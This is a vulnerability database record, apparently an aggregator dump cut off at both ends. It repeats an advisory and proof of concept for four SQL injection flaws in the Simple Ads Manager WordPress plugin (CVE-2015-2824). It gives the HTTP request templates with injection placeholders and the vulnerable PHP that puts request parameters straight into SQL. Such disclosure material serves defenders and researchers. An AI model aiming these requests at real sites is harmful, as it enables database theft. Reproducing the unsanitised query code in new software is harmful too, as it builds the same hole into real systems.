__utma=30068390.891873145.1426646160.1426734944.1427794022.6;\r\n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n;\r\nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%\r\n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3\r\nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;\r\nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;\r\nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;\r\n__utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 73\r\n\r\naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION\r\nHERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL\r\nINJECTION HERE>&sadmin=<SQL INJECTION HERE>\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n\r\n+ Vulnerable code: from line 188 to 223\r\n case 'sam_ajax_load_users':\r\n $roleSubscriber = (isset($_REQUEST['subscriber'])) ?\r\nurldecode($_REQUEST['subscriber']) : 'Subscriber';\r\n $roleContributor = (isset($_REQUEST['contributor'])) ?\r\nurldecode($_REQUEST['contributor']) : 'Contributor';\r\n $roleAuthor = (isset($_REQUEST['author'])) ?\r\nurldecode($_REQUEST['author']) : 'Author';\r\n $roleEditor = (isset($_REQUEST['editor'])) ?\r\nurldecode($_REQUEST['editor']) : 'Editor';\r\n $roleAdministrator = (isset($_REQUEST["admin"])) ?\r\nurldecode($_REQUEST["admin"]) : 'Administrator';\r\n $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?\r\nurldecode($_REQUEST['sadmin']) : 'Super Admin';\r\n $sql = "SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n (CASE wum.meta_value\r\n WHEN 0 THEN '$roleSubscriber'\r\n WHEN 1 THEN '$roleContributor'\r\n WHEN 2 THEN '$roleAuthor'\r\n ELSE\r\n IF(wum.meta_value > 2 AND wum.meta_value <= 7,\r\n'$roleEditor',\r\n IF(wum.meta_value > 7 AND wum.meta_value <= 10,\r\n'$roleAdministrator',\r\n IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)\r\n )\r\n )\r\n END) AS role\r\n FROM $uTable wu\r\n INNER JOIN $umTable wum\r\n ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'\r\n ORDER BY wu.id;";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $k = 0;\r\n foreach($users as &$val) {\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = $users;\r\n break;\r\n\r\n\r\n\r\n\r\nBest Regards\r\n-----------------------------------\r\nITAS Team (www.itas.vn)\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32054", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32054", "title": "Wordpress plugin Simple Ads Manager - SQL Injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-2824"], "description": "\r\n\r\n#Vulnerability title: Wordpress plugin Simple Ads Manager - Multiple SQL\r\nInjection\r\n#Product: Wordpress plugin Simple Ads Manager\r\n#Vendor: https://profiles.wordpress.org/minimus/\r\n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 #Download link:\r\nhttps://wordpress.org/plugins/simple-ads-manager/\r\n#CVE ID: CVE-2015-2824\r\n#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team\r\n\r\n\r\n::PROOF OF CONCEPT::\r\n\r\n---SQL INJECTION 1---\r\n\r\n+ REQUEST:\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101\r\nFirefox/28.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/\r\nContent-Length: 270\r\nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938;\r\nPHPSESSID=kqvtir87g33e2ujkc290l5bmm7;\r\ncre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION\r\nHERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL\r\nINJECTION HERE>&level=3\r\n\r\n\r\n- Vulnerable file: simple-ads-manager/sam-ajax.php\r\n- Vulnerable code:\r\n\r\n\t case 'sam_ajax_sam_hits':\r\n\t\t if(isset($_POST['hits']) && is_array($_POST['hits'])) {\r\n\t\t\t $hits = $_POST['hits'];\r\n\t\t\t $values = '';\r\n\t\t\t $remoteAddr = $_SERVER['REMOTE_ADDR'];\r\n\t\t\t foreach($hits as $hit) {\r\n\t\t\t\t $values .= ((empty($values)) ? '' : ', ')\r\n. "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")";\r\n\t\t\t }\r\n\t\t\t $sql = "INSERT INTO $sTable (id, pid, event_time,\r\nevent_type, remote_addr) VALUES {$values};";\r\n\t\t\t $result = $wpdb->query($sql);\r\n\t\t\t if($result > 0) echo json_encode(array('success'\r\n=> true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));\r\n\t\t\t else echo json_encode(array(\r\n\t\t\t\t 'success' => false,\r\n\t\t\t\t 'result' => $result,\r\n\t\t\t\t 'sql' => $sql,\r\n\t\t\t\t 'hits' => $hits,\r\n\t\t\t\t 'values' => $values\r\n\t\t\t ));\t\r\n\t\t }\r\n\t\t break;\r\n\r\n\r\n\t\t \r\n\t\t \r\n---SQL INJECTION 2---\r\n+REQUEST\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\n\r\naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+ Vulnerable code:\r\ncase 'sam_ajax_load_posts':\r\n $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';\r\n $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) :\r\n'Post';\r\n $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) :\r\n'Page';\r\n\r\n //set @row_num = 0;\r\n //SELECT @row_num := @row_num + 1 AS recid\r\n $sql = "SELECT\r\n wp.id,\r\n wp.post_title AS title,\r\n wp.post_type AS type\r\n FROM\r\n $postTable wp\r\n WHERE\r\n wp.post_status = 'publish' AND\r\n FIND_IN_SET(wp.post_type, 'post,page{$custs}')\r\n ORDER BY wp.id;";\r\n\r\n $posts = $wpdb->get_results($sql, ARRAY_A);\r\n\r\n $k = 0;\r\n foreach($posts as &$val) {\r\n switch($val['type']) {\r\n case 'post':\r\n $val['type'] = $sPost;\r\n break;\r\n case 'page':\r\n $val['type'] = $sPage;\r\n break;\r\n default:\r\n $val['type'] = $sPost . ': '.$val['type'];\r\n break;\r\n }\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = array(\r\n 'status' => 'success',\r\n 'total' => count($posts),\r\n 'records' => $posts\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n---SQL INJECTION 3---\r\n+REQUEST:\r\n\r\nPOST\r\n/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL\r\nINJECTION HERE> HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101\r\nFirefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;\r\n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n;\r\nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%\r\n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3\r\nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;\r\nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;\r\nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;\r\n__utmb=30068390.1.10.1427794022; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n\r\naction=load_combo_data\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+Vulnerable code: from line 225 to 255\r\n case 'sam_ajax_load_combo_data':\r\n $page = $_GET['page'];\r\n $rows = $_GET['rows'];\r\n $searchTerm = $_GET['searchTerm'];\r\n $offset = ((int)$page - 1) * (int)$rows;\r\n $sql = "SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n wu.user_email AS email\r\n FROM\r\n $uTable wu\r\n WHERE wu.user_nicename LIKE '{$searchTerm}%'\r\n ORDER BY wu.id\r\n LIMIT $offset, $rows;";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $sql = "SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE\r\n'{$searchTerm}%';";\r\n $rTotal = $wpdb->get_var($sql);\r\n $total = ceil((int)$rTotal/(int)$rows);\r\n $out = array(\r\n 'page' => $page,\r\n 'records' => count($users),\r\n 'rows' => $users,\r\n 'total' => $total,\r\n 'offset' => $offset\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n\t \r\n---SQL INJECTION 4---\r\n\r\n+ REQUEST\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101\r\nFirefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6;\r\n__utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)\r\n;\r\nwp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%\r\n3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3\r\nDshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1;\r\nwp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5;\r\nwordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1;\r\n__utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 73\r\n\r\naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION\r\nHERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL\r\nINJECTION HERE>&sadmin=<SQL INJECTION HERE>\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n\r\n+ Vulnerable code: from line 188 to 223\r\n case 'sam_ajax_load_users':\r\n $roleSubscriber = (isset($_REQUEST['subscriber'])) ?\r\nurldecode($_REQUEST['subscriber']) : 'Subscriber';\r\n $roleContributor = (isset($_REQUEST['contributor'])) ?\r\nurldecode($_REQUEST['contributor']) : 'Contributor';\r\n $roleAuthor = (isset($_REQUEST['author'])) ?\r\nurldecode($_REQUEST['author']) : 'Author';\r\n $roleEditor = (isset($_REQUEST['editor'])) ?\r\nurldecode($_REQUEST['editor']) : 'Editor';\r\n $roleAdministrator = (isset($_REQUEST["admin"])) ?\r\nurldecode($_REQUEST["admin"]) : 'Administrator';\r\n $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ?\r\nurldecode($_REQUEST['sadmin']) : 'Super Admin';\r\n $sql = "SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n (CASE wum.meta_value\r\n WHEN 0 THEN '$roleSubscriber'\r\n WHEN 1 THEN '$roleContributor'\r\n WHEN 2 THEN '$roleAuthor'\r\n ELSE\r\n IF(wum.meta_value > 2 AND wum.meta_value <= 7,\r\n'$roleEditor',\r\n IF(wum.meta_value > 7 AND wum.meta_value <= 10,\r\n'$roleAdministrator',\r\n IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)\r\n )\r\n )\r\n END) AS role\r\n FROM $uTable wu\r\n INNER JOIN $umTable wum\r\n ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'\r\n ORDER BY wu.id;";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $k = 0;\r\n foreach($users as &$val) {\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = $users;\r\n break;\r\n\r\nREFERENCE: \r\n+ https://www.youtube.com/watch?v=HPJ1r9dhIB4\r\n\r\n\r\nBest Regards\r\n-----------------------------------\r\nITAS Team (www.itas.vn)\r\n\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32055", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32055", "title": "Wordpress plugin Simple Ads Manager - Multiple SQL Injection", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3302", "CVE-2010-5312", "CVE-2015-2316", "CVE-2015-3439", "CVE-2015-2295", "CVE-2015-3438", "CVE-2015-3429", "CVE-2015-2755", "CVE-2015-0278", "CVE-2014-4165", "CVE-2015-3300", "CVE-2015-3421", "CVE-2015-2825", "CVE-2015-2294", "CVE-2015-3301", "CVE-2015-2317", "CVE-2015-2210", "CVE-2015-2824", "CVE-2015-3440"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14473", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T03:54:04", "description": "Wordpress Simple Ads Manager Plugin - Multiple SQL Injection. CVE-2015-2824. Webapps exploit for php platform", "published": "2015-04-02T00:00:00", "type": "exploitdb", "title": "WordPress Simple Ads Manager Plugin - Multiple SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2824"], "modified": "2015-04-02T00:00:00", "id": "EDB-ID:36613", "href": "https://www.exploit-db.com/exploits/36613/", "sourceData": "#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection\r\n#Product: Wordpress plugin Simple Ads Manager\r\n#Vendor: https://profiles.wordpress.org/minimus/\r\n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96\r\n#Download link: https://wordpress.org/plugins/simple-ads-manager/\r\n#CVE ID: CVE-2015-2824\r\n#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team\r\n\r\n\r\n::PROOF OF CONCEPT::\r\n\r\n---SQL INJECTION 1---\r\n\r\n+ REQUEST:\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1\r\nHost: target.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/\r\nContent-Length: 270\r\nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3\r\n\r\n\r\n- Vulnerable file: simple-ads-manager/sam-ajax.php\r\n- Vulnerable code:\r\n\r\n\t case 'sam_ajax_sam_hits':\r\n\t\t if(isset($_POST['hits']) && is_array($_POST['hits'])) {\r\n\t\t\t $hits = $_POST['hits'];\r\n\t\t\t $values = '';\r\n\t\t\t $remoteAddr = $_SERVER['REMOTE_ADDR'];\r\n\t\t\t foreach($hits as $hit) {\r\n\t\t\t\t $values .= ((empty($values)) ? '' : ', ') . \"({$hit[1]}, {$hit[0]}, NOW(), 0, \\\"{$remoteAddr}\\\")\";\r\n\t\t\t }\r\n\t\t\t $sql = \"INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};\";\r\n\t\t\t $result = $wpdb->query($sql);\r\n\t\t\t if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));\r\n\t\t\t else echo json_encode(array(\r\n\t\t\t\t 'success' => false,\r\n\t\t\t\t 'result' => $result,\r\n\t\t\t\t 'sql' => $sql,\r\n\t\t\t\t 'hits' => $hits,\r\n\t\t\t\t 'values' => $values\r\n\t\t\t ));\t\r\n\t\t }\r\n\t\t break;\r\n\r\n\r\n\t\t \r\n\t\t \r\n---SQL INJECTION 2---\r\n+REQUEST\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\n\r\naction=load_posts&cstr=<SQL INJECTION HERE>&sp=Post&spg=Page\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+ Vulnerable code:\r\ncase 'sam_ajax_load_posts':\r\n $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : '';\r\n $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post';\r\n $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page';\r\n\r\n //set @row_num = 0;\r\n //SELECT @row_num := @row_num + 1 AS recid\r\n $sql = \"SELECT\r\n wp.id,\r\n wp.post_title AS title,\r\n wp.post_type AS type\r\n FROM\r\n $postTable wp\r\n WHERE\r\n wp.post_status = 'publish' AND\r\n FIND_IN_SET(wp.post_type, 'post,page{$custs}')\r\n ORDER BY wp.id;\";\r\n\r\n $posts = $wpdb->get_results($sql, ARRAY_A);\r\n\r\n $k = 0;\r\n foreach($posts as &$val) {\r\n switch($val['type']) {\r\n case 'post':\r\n $val['type'] = $sPost;\r\n break;\r\n case 'page':\r\n $val['type'] = $sPage;\r\n break;\r\n default:\r\n $val['type'] = $sPost . ': '.$val['type'];\r\n break;\r\n }\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = array(\r\n 'status' => 'success',\r\n 'total' => count($posts),\r\n 'records' => $posts\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n---SQL INJECTION 3---\r\n+REQUEST:\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php?searchTerm=<SQL INJECTION HERE> HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmb=30068390.1.10.1427794022; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\n\r\naction=load_combo_data\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n+Vulnerable code: from line 225 to 255\r\n case 'sam_ajax_load_combo_data':\r\n $page = $_GET['page'];\r\n $rows = $_GET['rows'];\r\n $searchTerm = $_GET['searchTerm'];\r\n $offset = ((int)$page - 1) * (int)$rows;\r\n $sql = \"SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n wu.user_email AS email\r\n FROM\r\n $uTable wu\r\n WHERE wu.user_nicename LIKE '{$searchTerm}%'\r\n ORDER BY wu.id\r\n LIMIT $offset, $rows;\";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $sql = \"SELECT COUNT(*) FROM $uTable wu WHERE wu.user_nicename LIKE '{$searchTerm}%';\";\r\n $rTotal = $wpdb->get_var($sql);\r\n $total = ceil((int)$rTotal/(int)$rows);\r\n $out = array(\r\n 'page' => $page,\r\n 'records' => count($users),\r\n 'rows' => $users,\r\n 'total' => $total,\r\n 'offset' => $offset\r\n );\r\n break;\r\n\r\n\t \r\n\t \r\n\t \r\n---SQL INJECTION 4---\r\n\r\n+ REQUEST\r\n\r\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1\r\nHost: hostname\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: __utma=30068390.891873145.1426646160.1426734944.1427794022.6; __utmz=30068390.1426646160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wp-settings-1=hidetb%3D1%26libraryContent%3Dbrowse%26imgsize%3Dfull%26align%3Dcenter%26urlbutton%3Dpost%26editor%3Dtinymce%26mfold%3Do%26advImgDetails%3Dshow%26ed_size%3D456%26dfw_width%3D822%26wplink%3D1; wp-settings-time-1=1426646255; PHPSESSID=9qrpbn6kh66h4eb102278b3hv5; wordpress_test_cookie=WP+Cookie+check; bp-activity-oldestpage=1; __utmc=30068390\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 73\r\n\r\naction=load_users&subscriber=<SQL INJECTION HERE>&contributor=<SQL INJECTION HERE>&author=<SQL INJECTION HERE>&editor=<SQL INJECTION HERE>&admin=<SQL INJECTION HERE>&sadmin=<SQL INJECTION HERE>\r\n\r\n+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php\r\n\r\n+ Vulnerable code: from line 188 to 223\r\n case 'sam_ajax_load_users':\r\n $roleSubscriber = (isset($_REQUEST['subscriber'])) ? urldecode($_REQUEST['subscriber']) : 'Subscriber';\r\n $roleContributor = (isset($_REQUEST['contributor'])) ? urldecode($_REQUEST['contributor']) : 'Contributor';\r\n $roleAuthor = (isset($_REQUEST['author'])) ? urldecode($_REQUEST['author']) : 'Author';\r\n $roleEditor = (isset($_REQUEST['editor'])) ? urldecode($_REQUEST['editor']) : 'Editor';\r\n $roleAdministrator = (isset($_REQUEST[\"admin\"])) ? urldecode($_REQUEST[\"admin\"]) : 'Administrator';\r\n $roleSuperAdmin = (isset($_REQUEST['sadmin'])) ? urldecode($_REQUEST['sadmin']) : 'Super Admin';\r\n $sql = \"SELECT\r\n wu.id,\r\n wu.display_name AS title,\r\n wu.user_nicename AS slug,\r\n (CASE wum.meta_value\r\n WHEN 0 THEN '$roleSubscriber'\r\n WHEN 1 THEN '$roleContributor'\r\n WHEN 2 THEN '$roleAuthor'\r\n ELSE\r\n IF(wum.meta_value > 2 AND wum.meta_value <= 7, '$roleEditor',\r\n IF(wum.meta_value > 7 AND wum.meta_value <= 10, '$roleAdministrator',\r\n IF(wum.meta_value > 10, '$roleSuperAdmin', NULL)\r\n )\r\n )\r\n END) AS role\r\n FROM $uTable wu\r\n INNER JOIN $umTable wum\r\n ON wu.id = wum.user_id AND wum.meta_key = '$userLevel'\r\n ORDER BY wu.id;\";\r\n $users = $wpdb->get_results($sql, ARRAY_A);\r\n $k = 0;\r\n foreach($users as &$val) {\r\n $k++;\r\n $val['recid'] = $k;\r\n }\r\n $out = $users;\r\n break;\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/36613/"}], "dsquare": [{"lastseen": "2019-05-29T15:31:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2824"], "description": "SQL injection vulnerability in WordPress Simple Ads Manager plugin sam-ajax-admin.php\n\nVulnerability Type: SQL Injection", "modified": "2015-05-01T00:00:00", "published": "2015-05-01T00:00:00", "id": "E-449", "href": "", "type": "dsquare", "title": "WordPress Simple Ads Manager SQL Injection", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:08", "description": "\nWordPress Plugin Simple Ads Manager - Multiple SQL Injections", "edition": 1, "published": "2015-04-02T00:00:00", "title": "WordPress Plugin Simple Ads Manager - Multiple SQL Injections", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2824"], "modified": "2015-04-02T00:00:00", "id": "EXPLOITPACK:F280005D75D4F24ECE63387866E4C483", "href": "", "sourceData": "#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection\n#Product: Wordpress plugin Simple Ads Manager\n#Vendor: https://profiles.wordpress.org/minimus/\n#Affected version: Simple Ads Manager 2.5.94 and 2.5.96\n#Download link: https://wordpress.org/plugins/simple-ads-manager/\n#CVE ID: CVE-2015-2824\n#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team\n\n\n::PROOF OF CONCEPT::\n\n---SQL INJECTION 1---\n\n+ REQUEST:\n\nPOST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1\nHost: target.com\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: http://target.com/archives/wordpress-plugin-simple-ads-manager/\nContent-Length: 270\nCookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1\nConnection: keep-alive\nPragma: no-cache\nCache-Control: no-cache\n\naction=sam_hits&hits%5B0%5D%5B%5D=<SQL INJECTION HERE>&hits%5B1%5D%5B%5D=<SQL INJECTION HERE>&hits%5B2%5D%5B%5D=<SQL INJECTION HERE>&level=3\n\n\n- Vulnerable file: simple-ads-manager/sam-ajax.php\n- Vulnerable code:\n\n\t case 'sam_ajax_sam_hits':\n\t\t if(isset($_POST['hits']) && is_array($_POST['hits'])) {\n\t\t\t $hits = $_POST['hits'];\n\t\t\t $values = '';\n\t\t\t $remoteAddr = $_SERVER['REMOTE_ADDR'];\n\t\t\t foreach($hits as $hit) {\n\t\t\t\t $values .= ((empty($values)) ? '' : ', ') . \"({$hit[1]}, {$hit[0]}, NOW(), 0, \\\"{$remoteAddr}\\\")\";\n\t\t\t }\n\t\t\t $sql = \"INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};\";\n\t\t\t $result = $wpdb->query($sql);\n\t\t\t if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR']));\n\t\t\t else echo json_encode(array(\n\t\t\t\t 'success' => false,\n\t\t\t\t 'result' => $result,\n\t\t\t\t 'sql' => $sql,\n\t\t\t\t 'hits' => $hits,\n\t\t\t\t 'values' => $values\n\t\t\t 